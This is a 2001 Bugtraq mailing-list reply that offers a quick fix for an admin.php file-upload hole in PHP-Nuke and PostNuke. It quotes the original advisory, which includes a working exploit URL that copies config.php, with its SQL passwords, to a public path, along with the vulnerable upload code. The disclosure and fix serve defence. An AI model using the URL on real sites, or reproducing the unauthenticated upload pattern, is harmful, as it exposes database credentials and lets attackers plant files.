Alternative "quickfix"; change
"if($upload) {" to
"if (($upload) && ($admintest)) {"
This at least works for PostNuke 0.62. I have not tested the latest PostNuke 0.63 - it may be vulnerable as well...
And btw; if you're not going to use the filemanager, disallow write access for the webuser (usually nobody or www) to all files/directories below webroot.
Magnus Skjegstad
----- Original Message -----
From: <supergate@twlc.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...
> Explanation
> Do you need sql password?
>
> http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
> t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted just go to
> http://www.server.net/images/hacked.txt and you will see config.php that as
> everyone knows contain the sql's passwords, you can even upload files...i
> leave you the 'fun' to find all the ways to use it... and try to dont be a
> SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
> LET YOU HAVE FUN.
>
> let me explain you the bug... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
> copy($userfile,$basedir.$wdir.$userfile_name);
> $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
> // This need a rewrite -------------------------------------> OMG! WE
> AGREEEEEEEE lmao
> //include("header.php");
> //GraphicAdmin($hlpfile);
> //html_header();
> //displaydir();
> $wdir2="/";
> chdir($basedir . $wdir2);
> //CloseTable();
> //include("footer.php");
> Header("Location: admin.php?op=FileManager");
> exit;
> }
